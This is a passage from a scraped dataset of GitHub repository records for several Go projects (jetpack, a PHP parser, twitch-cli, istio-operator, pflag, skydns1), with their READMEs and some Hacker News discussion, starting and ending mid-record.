sourcing), but not for explicitly partisan ones.Ironically, if I were running a business efficiently, I'd probably want to pick one side and stick to it. If I sell to everyone, and I have competitors who focus on the blue tribe and ones who focus on the red tribe, they'll have a competitive advantage over me with any given consumer, and I'll be left with the very few people who aren't on either side.> Years later, for many, Jordan\u2019s brand is intrinsically tied to this choice.I really dislike this kind of journalism. How many is \"many\"? Is it just the author and their circle? Is it just people who insist that everything is political? I think this is a lazy assertion, which is a shame because I enjoyed the content that followed it. Surely there's a better introduction available.> Our desire to be in tribes feels natural.People need to realize the consequences of this because it is the go-to tool for manipulating people. Creating division is creating tribes that people can belong to (and, by extension, another tribe they can blame for their problems). Racism, sexism, immigrants, homophobia and transphobia are obvious examples.But there's a way more pervasive version of this: the myth of the middle class. The middle class is propaganda to create division between the completely made up middle class and the completely made up lower class.> Workplace preferences see co-partisan workers paid more and promoted faster, despite at times being less qualified.In tech we call this \"culture fit\" and it's pervasive and real.> Republicans are more entrepreneurial. Conservatives start more firms than liberals ...Is this adjusted for socioeconomic conditions?The positive framing of this phenomenon is strange. Someone muting his criticism against an open segregationist because his voters buy sneakers is probably one of the more cartoonish examples of market logic and self-interest crowding out people's values.And I mean this even in a value neutral sense in regards to the topic itself. It's as if a devout Christian would start selling abortion pills or a pacifist became an arms dealer.When the article uses the phrase 'tribalism' it seems to me they just mean 'political'. People have started to prioritize values over economic calculus again after the monoculture of the 90s, which this kind of a thing was a product of.> A series of surveys suggests that people who identify as conservative are more likely to want to do this by buying products marketed as \u201cbetter,\u201d while liberals are more drawn to messaging that emphasizes that the product is \u201cdifferent.\u201d\u201dthis is interesting. I would be more drawn to messaging on \"different\", but mostly because I wouldn't trust a company to be an impartial judge on what is \"better\" - I would look to reviews rather than marketing for that. I guess it also represents a difference in notions of black and white thinking as well. I'd be curious to hear which one appeals more to people and why.Another good memo - less controversial :) https://news.ycombinator.com/item?id=32513917Slytherin Buy Sneakers TooBusinesses are supposed to be separate entities from the individuals who own them. I don't understand why people think businesses need to be political. If that's the case then just start your own Political Action Committee.The woke-PR institutions that are meant to be criticized by this already account for it. Companies that sell direct-to-consumer are not trying to outwoke each other, they're resting in the same moderate, optimistic, positive, there are well-intentioned people on both sides place they always were.Where you see the aggressive enforcement of woke sentiment is within industries who are fighting regulation. To think about Republican voters (not politicians, who are of course important for them) is wasted time. All of them are going to vote for politicians who will not regulate these companies, no matter how their base feels about the companies and their messaging. Their Democratic politicians, however, could be voted out and replaced with eager regulators for helping a company that has been cancelled.Instead of thinking about regulation, it's important that the Democratic voter ask: \u201cIf we broke up the big banks tomorrow... would that end racism? Would that end sexism?\u201di.e. Their Dem politicians need to be protected, their Republican politicians do not.There's a meme, where someone goes on a rant in the wrong location and someone responds \"Sir, this is a Wendy's\".Maybe we need one for \"Sir, this company sells shoes\". It isn't clear to me why a person trying to sell shoes needs to take a stand about one politician or another. Except for the fact that there is only one thing partisans hate more than their enemies - the people who aren't part of the partisan fray.Picture, seeing as Bloomberg didn't bother:\nhttps://www.roboticsandinnovation.co.uk/wp-content/uploads/2...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "3ofcoins/jetpack", "link": "https://github.com/3ofcoins/jetpack", "tags": [], "stars": 528, "description": "**PROTOTYPE** FreeBSD Jail/ZFS based implementation of the Application Container Specification", "lang": "Go", "repo_lang": "", "readme": "> **WARNING:** This software is new, experimental, and under heavy\n> development. The documentation is lacking, if any. There are almost\n> no tests. The CLI commands, on-disk formats, APIs, and source code\n> layout can change in any moment. Do not trust it. Use it at your own\n> risk.\n>\n> **You have been warned**\n\nJetpack\n=======\n\nJetpack is an **experimental and incomplete** implementation of the\n[App Container Specification](https://github.com/appc/spec) for\nFreeBSD. It uses jails as isolation mechanism, and ZFS for layered\nstorage.\n\nThis document uses some language used in\n[Rocket](https://github.com/coreos/rocket), the reference\nimplementation of the App Container Specification. While the\ndocumentation will be expanded in the future, currently you need to be\nfamiliar at least with Rocket's README to understand everything.\n\nCompatibility\n-------------\n\nJetpack is developed and tested on an up-to-date FreeBSD 10.1 system,\nand compiled with Go 1.4. Earlier FreeBSD releases are not supported.\n\nGetting Started\n---------------\n### VM with vagrant\nTo spin up a pre configured FreeBSD VM with [Vagrant](https://www.vagrantup.com)\n\nMake sure you have [ansible](http://docs.ansible.com/intro_installation.html#getting-ansible) installed on the host system.\n\nThen boot and provision the VM by running `$ vagrant up` in the root directory of this repository.\nRun `$ vagrant ssh` to ssh into the machine. \nThe code is mounted under `/vagrant`.\n\n### Configuring the system\n\nFirst, build Jetpack and install it (see the [INSTALL.md](INSTALL.md)\ndocument for installation instructions).\n\nYou will obviously need a ZFS pool for Jetpack's datasets. By default,\nJetpack will create a `zroot/jetpack` dataset and mount it at\n`/var/jetpack`. If your zpool is not named _zroot_, or if you prefer\ndifferent locations, these defaults can be modified in the\n`jetpack.conf` file.\n\nYou will need a user and group to own the runtime status files and\navoid running the metadata service as root. If you stay with default\nsettings, the username and group should be `_jetpack`:\n\n pw useradd _jetpack -d /var/jetpack -s /usr/sbin/nologin\n\n> **Note:** If you are upgrading from an earlier revision of Jetpack,\n> you will need to change ownership of files and directories:\n> `chgrp _jetpack /var/jetpack/pods/* /var/jetpack/images/*\n> /var/jetpack/*/*/manifest && chmod 0440 /var/jetpack/*/*/manifest`\n\nYou will also need a network interface that the jails will use, and\nthis interface should have Internet access. By default, Jetpack uses\n`lo1`, but this can be changed in the `jetpack.conf` file. To create\nthe interface, run the following command as root:\n\n ifconfig lo1 create inet 172.23.0.1/16\n\nTo have the `lo1` interface created at boot time, add the following\nlines to `/etc/rc.conf`:\n\n cloned_interfaces=\"lo1\"\n ipv4_addrs_lo1=\"172.23.0.1/16\"\n\nThe main IP address of the interface will be used as the host\naddress. Remaining addresses within its IP range (in this case,\n172.23.0.2 to 172.23.255.254) will be assigned to the pods. IPv6\nis currently not supported.\n\nThe simplest way to provide internet access to the jails is to NAT the\nloopback interface. A proper snippet of PF firewall configuration\nwould be:\n\n set skip on lo1\n nat pass on $ext_if from lo1:network to any -> $ext_if\n\nwhere `$ext_if` is your external network interface. A more\nsopihisticated setup can be desired to limit pods'\nconnectivity. In the long run, Jetpack will probably manage its own\n`pf` anchor.\n\nYou will need to create a `jetpack.conf` file (by default,\n`/usr/local/etc/jetpack.conf`) with at least following settings:\n\n mds.signing-key = RANDOM_HEX_KEY\n mds.token-key = RANDOM_HEX_KEY\n\nYou can generate random hex keys by running `openssl rand -hex 32` and\npasting its output.\n\n### Using Jetpack\n\nRun `jetpack` without any arguments to see available commands. Use\n`jetpack help COMMAND` to see detailed help on individual commands.\n\nTo initialize the ZFS datasets and directory structure, run `jetpack\ninit`.\n\nTo get a console, run:\n\n jetpack run -t 3ofcoins.net/freebsd-base\n\nThis will fetch our signing GPG key, then fetch the FreeBSD base ACI,\nand finally run a pod and drop you into its console. After you exit\nthe shell, run `jetpack list` to see the pod, and `jetpack destroy\nUUID` to remove id.\n\nRun `jetpack images` to list available images.\n\nYou create pods from images, then run the pods:\n\n jetpack prepare 3ofcoins.net/freebsd-base\n\nNote the pod UUID printed by the above command (no user-friendly pod\nnames yet) or get it from the pod list (run `jetpack list` to see the\nlist). Then run the pod:\n\n jetpack run -t $UUID\n\nThe above command will drop you into root console of the pod. After\nyou're finished, you can run the pod again. Once you're done with the\npod, you can destroy it:\n\n jetpack destroy $UUID\n\nYou can also look at the \"showenv\" example:\n\n make -C images/example.showenv\n jetpack prepare example/showenv\n jetpack run $UUID\n\nTo poke inside a pod that, like the \"showenv\" example, runs a useful\ncommand instead of a console, use the `console` subcommand:\n\n jetpack console $UUID\n\nRun `jetpack help` to see info on remaining available commands, and if\nsomething needs clarification, create an issue at\nhttps://github.com/3ofcoins/jetpack/ and ask the question. If\nsomething is not clear, it's a bug in the documentation!\n\n#### Running the Metadata Service\n\nTo start the metadata service, run `$(jetpack config path.libexec)/mds`.\n\nBuilding Images\n---------------\n\nSee the [IMAGES.md](IMAGES.md) file for details. Some example image\nbuild scripts (including the published `3ofcoins.net/freebsd-base`\nimage) are provided in the `images/` directory.\n\nFeatures, or The Laundry List\n-----------------------------\n\n - Stage0\n - [x] Image import from ACI\n - [x] Image building\n - [x] Clone pod from image and run it\n - [ ] Full pod lifecycle (Stage0/Stage1 interaction)\n - [x] Multi-application pods\n - [x] Image discovery\n - Stage1\n - [x] Isolation via jails\n - [x] Volumes\n - [x] Multi-application pods\n - [ ] Firewall integration\n - [x] Metadata endpoint\n - [ ] Isolators\n - Stage2\n - [x] Main entry point execution\n - [x] Setting UID/GID\n - [x] Setting environment variables\n - [x] Event Handlers\n - [ ] Isolators\n - CLI\n - [X] Specify image/pod by name & labels, not only UUID\n - [x] Consistent options for specifying application options (CLI,\n JSON file)\n - General TODO\n - [x] Refactor the Thing/ThingManager/Host sandwich to use embedded\n fields\n - [ ] CLI-specified types.App fields for custom exec, maybe build\n parameters too?\n - [ ] Live, movable \"tags\" or \"bookmarks\", to mark e.g. latest\n version of an image without need to modify its\n manifest. Possible search syntax: `name@tag1,tag2,\u2026`, where a\n tag is an ACName, so it may be also a key/value pair like\n `environment/production`.\n - [ ] Maybe some variant of tags that would be unique per\n name?\n - [ ] `/etc/rc.d/jetpack` (`/etc/rc.d/jetpack_` for individual\n pods?) to start pods at boot time, and generally\n manage them as services\n - [ ] Port to install Jetpack system-wide\n - If/when we get enough live runtime data to make it complicated,\n maybe a centralized indexed storage, like SQLite? This could also\n solve some locking issues for long-running processes\u2026\n", "readme_type": "markdown", "hn_comments": "Please call it something else. Mozilla's plug-in API is called \"Jetpack\". Thanks.I would use this, I really would, but the problem I have with ZFS RAID-Z1 and 2 shares, once you setup the storage pool, you can't dynamically add hard drives to the pool, you have to set it up weirdly like RAIDZ-1+1. All I want to do is add more storage to my 5TB pool without having to wipe it all or change the configuration to something else because I want to add a hard drive.Maybe it's better to help that one guy work on cbsd? http://www.bsdstore.ru/en/about.htmlThe best alternative:\nhttp://www.7he.at/freebsd/vps/Jails aren't that great:\nhttps://aboutthebsds.wordpress.com/2013/01/13/freebsd-jails-...But there is Capsicum too:\nhttp://lwn.net/Articles/482858/I'm still working on a generalized system (not OS specific), with ZFS support in there and working. Have begun discussions about open sourcing this with management. In theory it will let people go 'show me this thing on platform and platform, benchmarked'. Platform strengths will then speak for themselves, and platform maintainers will have the same version/build/evaluate loop that regular service developers use. http://stani.sh/walter/pfcts/This looks interesting, I'm still holding my breath to see if Joyent are going to bring zfs support to docker though. It looks like they're working on reviving lx branded zones instead which is a bit of a bummer as they are (or were) pretty terrible.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "stephens2424/php", "link": "https://github.com/stephens2424/php", "tags": ["go", "parse", "php", "parser-php"], "stars": 528, "description": "Parser for PHP written in Go", "lang": "Go", "repo_lang": "", "readme": "php\n===\n\nArchived: This project only supported PHP 5, and never matured beyond a basic parser and AST visualizer. Since I lost interest, it has fallen into disrepair, beyond the more conventional bugs.\n\n---\n\nParser for PHP written in Go\n\nSee [this post](https://stephensearles.com/ive-got-all-this-php-now-what-parsing-php-in-go/) for an introduction.\n\n[![Build Status](https://travis-ci.org/stephens2424/php.svg)](https://travis-ci.org/stephens2424/php) [![GoDoc](https://godoc.org/github.com/stephens2424/php?status.svg)](https://godoc.org/github.com/stephens2424/php)\n\nTest console:\n\n[![console](https://stephensearles.com/wp-content/uploads/2014/07/Screen-Shot-2014-07-27-at-12.02.32-PM.png)](https://phpconsole.stephensearles.com)\n\n## Project Status\n\nThis project is under heavy development, though some pieces are more or less stable. Listed here are components that in progress or are ideas for future development\n\nFeature |Status\n------------------------------|------\nLexer and Parser | mostly complete. there are probably a few gaps still\nScoping | complete for simple cases. probably some gaps still, most notably that conditional definitions are treated as if they are always defined\nCode search and symbol lookup | basic idea implemented, many many details missing\nCode formatting | basic idea implemented, formatting needs to narrow down to PSR-2\nTranspilation to Go | basic idea implemented, need follow through with more node types\nType inferencing | not begun\nDead code analysis | basic idea implemented, but only for some types of code. Also, this suffers from the same caveats as scoping\n\n## Project Components\n\nDirectory |Description\n------------------------------|------\nphp/ast| (abstract syntax tree) describes the nodes in PHP as parsed by the parser\nphp/ast/printer| prints an ast back to source code\nphp/cmd| a tool used to debug the parser\nphp/lexer| reads a stream of tokens from source code\nphp/parser| the core parser\nphp/passes| tools and packages related to modifying or analyzing PHP code (heavily a work in progress)\nphp/passes/togo| transpiler\nphp/passes/deadcode| dead code analyzer\nphp/query| tools and packages related to analyzing and finding things in PHP code (heavily a work in progress)\nphp/testdata| simple examples of PHP that must parse with no errors for tests to pass\nphp/token| describes the tokens read by the lexer\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "twitchdev/twitch-cli", "link": "https://github.com/twitchdev/twitch-cli", "tags": ["cli", "twitch"], "stars": 527, "description": "The official Twitch CLI to make developing on Twitch easier.", "lang": "Go", "repo_lang": "", "readme": "# Twitch CLI \n\n- [Twitch CLI](#twitch-cli)\n - [Download](#download)\n - [Homebrew](#homebrew)\n - [Scoop](#scoop)\n - [Manual Download](#manual-download)\n - [Usage](#usage)\n - [Commands](#commands)\n - [Contributing](#contributing)\n - [License](#license)\n\n## Download\n\nThere are two options to download/install the Twitch CLI for each platform. \n\n### Homebrew\n\nIf you are using MacOS or Linux, we recommend using [Homebrew](https://brew.sh/) for installing the CLI as it will also manage the versioning for you. \n\nTo install via Homebrew, run `brew install twitchdev/twitch/twitch-cli` and it'll be callable via `twitch`. \n\n### Scoop\n\nIf you are using Windows, we recommend using [Scoop](https://scoop.sh/) for installing the CLI, as it'll also manage versioning. \n\nTo install via Scoop, run: \n\n```sh\nscoop bucket add twitch https://github.com/twitchdev/scoop-bucket.git\nscoop install twitch-cli\n```\n\nThis will install it into your path, and it'll be callable via `twitch`. \n\n### Manual Download\n\nTo download, go to the [Releases tab of GitHub](https://github.com/twitchdev/twitch-cli/releases). The examples in the documentation assume you have put this into your PATH and renamed to `twitch` (or symlinked as such).\n\n**Note**: If using MacOS and downloading manually, you may need to adjust the permissions of the file to allow for execution.\n\nTo do so, please run: `chmod 755 ` where the filename is the name of the downloaded binary. \n\n## Usage\n\nThe CLI largely follows a standard format: \n\n```sh\ntwitch \n```\n\nThe commands are described below, and any accompanying args/flags will be in the accompanying subsections.\n\n## Commands\n\nThe CLI currently supports the following products: \n\n- [api](./docs/api.md)\n- [configure](./docs/configure.md)\n- [event](docs/event.md)\n- [mock-api](docs/mock-api.md)\n- [token](docs/token.md)\n- [version](docs/version.md)\n\n## Contributing\n\nCheck out [CONTRIBUTING.md](./CONTRIBUTING.md) for notes on making contributions.\n\n## License \n\nThis library is licensed under the Apache 2.0 License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "banzaicloud/istio-operator", "link": "https://github.com/banzaicloud/istio-operator", "tags": ["istio", "service-mesh", "kubernetes", "kubernetes-operator", "golang"], "stars": 527, "description": "An operator that manages Istio deployments on Kubernetes", "lang": "Go", "repo_lang": "", "readme": "# Istio operator\n\nIstio operator is a Kubernetes operator to deploy and manage [Istio](https://istio.io/) resources for a Kubernetes cluster.\n\n## Overview\n\n[Istio](https://istio.io/) is an open platform to connect, manage, and secure microservices and it is emerging as the `standard` for building service meshes on Kubernetes.\n\nThe goal of the **Istio-operator** is to enable popular service mesh use cases (multi cluster topologies, multiple gateways support etc) by introducing easy to use higher level abstractions.\n\n## In this README\n\n- [Istio operator](#istio-operator)\n - [Overview](#overview)\n - [In this README](#in-this-readme)\n - [Istio operator vs Calisti](#istio-operator-vs-calisti)\n - [Getting started](#getting-started)\n - [Prerequisites](#prerequisites)\n - [Build and deploy](#build-and-deploy)\n - [Issues, feature requests](#issues-feature-requests)\n - [Contributing](#contributing)\n - [Got stuck? Find help!](#got-stuck-find-help)\n - [Community support](#community-support)\n - [Engineering blog](#engineering-blog)\n - [License](#license)\n\n## Istio operator vs [Calisti](https://calisti.app/)\n\n[Calisti](https://calisti.app/) is an enterprise ready Istio platform for DevOps and SREs that automates lifecycle management and simplifies connectivity, security & observability for microservice based applications.\nThe Cisco Istio operator is a core part of Calisti's Service Mesh Manager (SMM) component, which helps with installing, upgrading and managing an Istio mesh, but SMM provides many other components to conveniently secure, operate and observe Istio as well.\n\nThe differences are presented in this table:\n\n| | Istio operator | Cisco Service Mesh Manager |\n|:-------------------------:|:-----------------------:|:--------------------------:|\n| Install Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Manage Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Upgrade Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Uninstall Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Multiple gateways support | :heavy_check_mark: | :heavy_check_mark: |\n| Multi cluster support | needs some manual steps | fully automatic |\n| Prometheus | | :heavy_check_mark: |\n| Grafana | | :heavy_check_mark: |\n| Jaeger | | :heavy_check_mark: |\n| Cert manager | | :heavy_check_mark: |\n| Dashboard | | :heavy_check_mark: |\n| CLI | | :heavy_check_mark: |\n| OIDC authentication | | :heavy_check_mark: |\n| VM integration | | :heavy_check_mark: |\n| Topology graph | | :heavy_check_mark: |\n| Outlier detection | | :heavy_check_mark: |\n| Service Level Objectives | | :heavy_check_mark: |\n| Live access logs | | :heavy_check_mark: |\n| mTLS management | | :heavy_check_mark: |\n| Gateway management | | :heavy_check_mark: |\n| Istio traffic management | | :heavy_check_mark: |\n| Validations | | :heavy_check_mark: |\n| Support | Community | Enterprise |\n\nFor a complete list of SMM features please check out the [SMM docs](https://smm-docs.eticloud.io/docs/).\n\n## Getting started\n\n### Prerequisites\n- kubectl installed\n- kubernetes cluster (version 1.22+)\n- active kubecontext to the kubernetes cluster\n\n### Build and deploy\nDownload or check out the latest stable release.\n\nRun `make deploy` to deploy the operator controller-manager on your kubernetes cluster.\n\nCheck if the controller is running in the `istio-system` namespace:\n```\n$ kubectl get pod -n istio-system\n\nNAME READY STATUS RESTARTS AGE\nistio-operator-controller-manager-6f764787c-rbnht 2/2 Running 0 5m18s\n```\n\nDeploy the [Istio control plane sample](config/samples/servicemesh_v1alpha1_istiocontrolplane.yaml) to the `istio-system` namespace\n```\n$ kubectl -n istio-system apply -f config/samples/servicemesh_v1alpha1_istiocontrolplane.yaml\nistiocontrolplane.servicemesh.cisco.com/icp-v116x-sample created\n```\n\nLabel the namespace, where you would like to enable sidecar injection for your pods. The label should consist of the name of the deployed IstioControlPlane and the namespace where it is deployed.\n```\n$ kubectl label namespace demoapp istio.io/rev=icp-v116x-sample.istio-system\nnamespace/demoapp labeled\n```\n\nDeploy the [Istio ingress gateway sample](config/samples/servicemesh_v1alpha1_istiomeshgateway.yaml) to your desired namespace\n```\n$ kubectl -n demoapp apply -f config/samples/servicemesh_v1alpha1_istiomeshgateway.yaml\nistiomeshgateway.servicemesh.cisco.com/imgw-sample created\n```\n\nDeploy your application (or the [sample bookinfo app](https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/platform/kube/bookinfo.yaml)).\n```\n$ kubectl -n demoapp apply -f https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/platform/kube/bookinfo.yaml\nservice/details created\nserviceaccount/bookinfo-details created\ndeployment.apps/details-v1 created\nservice/ratings created\nserviceaccount/bookinfo-ratings created\ndeployment.apps/ratings-v1 created\nservice/reviews created\nserviceaccount/bookinfo-reviews created\ndeployment.apps/reviews-v1 created\ndeployment.apps/reviews-v2 created\ndeployment.apps/reviews-v3 created\nservice/productpage created\nserviceaccount/bookinfo-productpage created\ndeployment.apps/productpage-v1 created\n```\n\nVerify that all applications pods are running and have the sidecar proxy injected. The READY column shows the number of containers for the pod: this should be 1/1 for the gateway, and at least 2/2 for the other pods (the original container of the pods + the sidecar container).\n```\n$ kubectl get pod -n demoapp\nNAME READY STATUS RESTARTS AGE\ndetails-v1-79f774bdb9-8xqwj 2/2 Running 0 35s\nimgw-sample-66555d5b84-kv62w 1/1 Running 0 7m21s\nproductpage-v1-6b746f74dc-cx6x6 2/2 Running 0 33s\nratings-v1-b6994bb9-g9vm2 2/2 Running 0 35s\nreviews-v1-545db77b95-rdmsp 2/2 Running 0 34s\nreviews-v2-7bf8c9648f-rzmvj 2/2 Running 0 34s\nreviews-v3-84779c7bbc-t5rfq 2/2 Running 0 33s\n```\n\nDeploy the VirtualService and Gateway needed for your application.\n**For the [demo bookinfo](https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/networking/bookinfo-gateway.yaml) application, you need to modify the Istio Gateway entry!** The `spec.selector.istio` field should be set from `ingressgateway` to `imgw-sample` so it will be applied to the sample IstioMeshGateway deployed before. The port needs to be set to the targetPort of the deployed IstioMeshGateway.\n```\ncurl https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/networking/bookinfo-gateway.yaml | sed 's/istio: ingressgateway # use istio default controller/istio: imgw-sample/g;s/number: 80/number: 9080/g' | kubectl apply -f -\n```\n```\n$ kubectl -n demoapp apply -f bookinfo-gateway.yaml\ngateway.networking.istio.io/bookinfo-gateway created\nvirtualservice.networking.istio.io/bookinfo created\n```\n\nTo access your application, use the public IP address of the `imgw-sample` LoadBalancer service.\n```\n$ IP=$(kubectl -n demoapp get svc imgw-sample -o jsonpath='{.status.loadBalancer.ingress[0].ip}')\n$ curl -I $IP/productpage\nHTTP/1.1 200 OK\ncontent-type: text/html; charset=utf-8\ncontent-length: 4183\nserver: istio-envoy\ndate: Mon, 02 May 2022 14:20:49 GMT\nx-envoy-upstream-service-time: 739\n```\n\n## Issues, feature requests\n\nPlease note that the Istio operator is constantly under development and new releases might introduce breaking changes.\nWe are striving to keep backward compatibility as much as possible while adding new features at a fast pace.\nIssues, new features or bugs are tracked on the projects [GitHub page](https://github.com/banzaicloud/istio-operator/issues) - please feel free to add yours!\n\n## Contributing\n\nIf you find this project useful here's how you can help:\n\n- Send a pull request with your new features and bug fixes\n- Help new users with issues they may encounter\n- Support the development of this project and star this repo!\n\n## Got stuck? Find help!\n\n### Community support\n\nIf you encounter any problems that is not addressed in our documentation, [open an issue](https://github.com/banzaicloud/istio-operator/issues) or talk to us on the [Banzai Cloud Slack channel #istio-operator.](https://pages.banzaicloud.com/invite-slack).\n\n### Engineering blog\n\nWe occasionally write blog posts about [Istio](https://ciscotechblog.com/tags/istio/) itself and the [Istio operator](https://ciscotechblog.com/tags/istio-operator/).\n\n## License\n\nCopyright (c) 2021 Cisco Systems, Inc. and/or its affiliates\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ogier/pflag", "link": "https://github.com/ogier/pflag", "tags": [], "stars": 527, "description": "Drop-in replacement for Go's flag package, implementing POSIX/GNU-style --flags.", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/ogier/pflag.png?branch=master)](https://travis-ci.org/ogier/pflag)\n\n## Description\n\npflag is a drop-in replacement for Go's flag package, implementing\nPOSIX/GNU-style --flags.\n\npflag is compatible with the [GNU extensions to the POSIX recommendations\nfor command-line options][1]. For a more precise description, see the\n\"Command-line flag syntax\" section below.\n\n[1]: http://www.gnu.org/software/libc/manual/html_node/Argument-Syntax.html\n\npflag is available under the same style of BSD license as the Go language,\nwhich can be found in the LICENSE file.\n\n## Installation\n\npflag is available using the standard `go get` command.\n\nInstall by running:\n\n go get github.com/ogier/pflag\n\nRun tests by running:\n\n go test github.com/ogier/pflag\n\n## Usage\n\npflag is a drop-in replacement of Go's native flag package. If you import\npflag under the name \"flag\" then all code should continue to function\nwith no changes.\n\n``` go\nimport flag \"github.com/ogier/pflag\"\n```\n\nThere is one exception to this: if you directly instantiate the Flag struct\nthere is one more field \"Shorthand\" that you will need to set.\nMost code never instantiates this struct directly, and instead uses\nfunctions such as String(), BoolVar(), and Var(), and is therefore\nunaffected.\n\nDefine flags using flag.String(), Bool(), Int(), etc.\n\nThis declares an integer flag, -flagname, stored in the pointer ip, with type *int.\n\n``` go\nvar ip *int = flag.Int(\"flagname\", 1234, \"help message for flagname\")\n```\n\nIf you like, you can bind the flag to a variable using the Var() functions.\n\n``` go\nvar flagvar int\nfunc init() {\n flag.IntVar(&flagvar, \"flagname\", 1234, \"help message for flagname\")\n}\n```\n\nOr you can create custom flags that satisfy the Value interface (with\npointer receivers) and couple them to flag parsing by\n\n``` go\nflag.Var(&flagVal, \"name\", \"help message for flagname\")\n```\n\nFor such flags, the default value is just the initial value of the variable.\n\nAfter all flags are defined, call\n\n``` go\nflag.Parse()\n```\n\nto parse the command line into the defined flags.\n\nFlags may then be used directly. If you're using the flags themselves,\nthey are all pointers; if you bind to variables, they're values.\n\n``` go\nfmt.Println(\"ip has value \", *ip)\nfmt.Println(\"flagvar has value \", flagvar)\n```\n\nAfter parsing, the arguments after the flag are available as the\nslice flag.Args() or individually as flag.Arg(i).\nThe arguments are indexed from 0 through flag.NArg()-1.\n\nThe pflag package also defines some new functions that are not in flag,\nthat give one-letter shorthands for flags. You can use these by appending\n'P' to the name of any function that defines a flag.\n\n``` go\nvar ip = flag.IntP(\"flagname\", \"f\", 1234, \"help message\")\nvar flagvar bool\nfunc init() {\n flag.BoolVarP(\"boolname\", \"b\", true, \"help message\")\n}\nflag.VarP(&flagVar, \"varname\", \"v\", 1234, \"help message\")\n```\n\nShorthand letters can be used with single dashes on the command line.\nBoolean shorthand flags can be combined with other shorthand flags.\n\nThe default set of command-line flags is controlled by\ntop-level functions. The FlagSet type allows one to define\nindependent sets of flags, such as to implement subcommands\nin a command-line interface. The methods of FlagSet are\nanalogous to the top-level functions for the command-line\nflag set.\n\n## Command line flag syntax\n\n```\n--flag // boolean flags only\n--flag=x\n```\n\nUnlike the flag package, a single dash before an option means something\ndifferent than a double dash. Single dashes signify a series of shorthand\nletters for flags. All but the last shorthand letter must be boolean flags.\n\n```\n// boolean flags\n-f\n-abc\n\n// non-boolean flags\n-n 1234\n-Ifile\n\n// mixed\n-abcs \"hello\"\n-abcn1234\n```\n\nFlag parsing stops after the terminator \"--\". Unlike the flag package,\nflags can be interspersed with arguments anywhere on the command line\nbefore this terminator.\n\nInteger flags accept 1234, 0664, 0x1234 and may be negative.\nBoolean flags (in their long form) accept 1, 0, t, f, true, false,\nTRUE, FALSE, True, False.\nDuration flags accept any input valid for time.ParseDuration.\n\n## More info\n\nYou can see the full reference documentation of the pflag package\n[at godoc.org][3], or through go's standard documentation system by\nrunning `godoc -http=:6060` and browsing to\n[http://localhost:6060/pkg/github.com/ogier/pflag][2] after\ninstallation.\n\n[2]: http://localhost:6060/pkg/github.com/ogier/pflag\n[3]: http://godoc.org/github.com/ogier/pflag\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "skynetservices/skydns1", "link": "https://github.com/skynetservices/skydns1", "tags": [], "stars": 527, "description": "DNS for skynet or any other service discovery", "lang": "Go", "repo_lang": "", "readme": "#SkyDNS2\n\nThis is an heads up that this version of SkyDNS is going to be replaced by\n[SkyDNS2](https://github.com/skynetservices/skydns) which is backed by etcd.\n\n*This* version will then be available under .\n\nThings are different in version 2, so please try it and report back any problems, success\nstories or whatever. You can report issues here or in the skydns2 repository.\n\nWe expect this change to take place somewhere mid May 2014, unless issues pop up.\n\n#SkyDNS [![Build Status](https://travis-ci.org/skynetservices/skydns1.png)](https://travis-ci.org/skynetservices/skydns1)\n*Version 0.2.0*\n\nSkyDNS is a distributed service for announcement and discovery of services. It\nleverages Raft for high-availability and consensus, and utilizes DNS queries\nto discover available services. This is done by leveraging SRV records in DNS,\nwith special meaning given to subdomains, priorities and weights.\n\nSkyDNS will also act as a forwarding DNS proxy, so that you can set your SkyDNS\ninstance as the primary DNS service in /etc/resolv.conf and SkyDNS will forward\nand proxy requests for which it is not authoritative.\n\nBesides serving SRV records, which include *all* the information you need to\nconnect to your service, SkyDNS will also return A records. This is useful if\nyou already know what port a particular service is using, and you just want a\nlist of IP addresses with known running instances.\n\n[Announcement Blog Post](http://blog.gopheracademy.com/skydns)\n\n##Setup / Install\n\nCompile SkyDNS, and execute it\n\n`go get -d -v ./... && go build -v ./...`\n\n`./skydns`\n\nWhich takes the following flags\n- -domain - This is the domain requests are anchored to and should be appended to all requests (Defaults to: skydns.local)\n- -http - This is the HTTP ip:port to listen on for API request (Defaults to: 127.0.0.1:8080)\n- -dns - This is the ip:port to listen on for DNS requests (Defaults to: 127.0.0.1:53)\n- -data - Directory that Raft logs will be stored in (Defaults to: ./data)\n- -join - When running a cluster of SkyDNS servers as recommended, you'll need to supply followers with where the other members can be found, this can be any member or a comma separated list of members. It does not have to be the leader. Any non-leader you join will redirect you to the leader automatically.\n- -discover - This flag can be used in place of explicitly supplying cluster members via the -join flag. It performs a DNS lookup using the hosts DNS server for NS records associated with the -domain flag to find the SkyDNS instances.\n- -metricsToStdErr - When this flag is set to true, metrics will be periodically written to standard error\n- -graphiteServer - When this flag is set to a Graphite Server URL:PORT, metrics will be posted to a graphite server\n- -stathatUser - When this flag is set to a valid StatHat user, metrics will be posted to that user's StatHat account periodically\n- -secret - When this variable is set, the HTTP api will require an authorization header that matches the secret passed to skydns when it starts\n- -nameserver - Nameserver address to forward (non-local) queries to e.g. 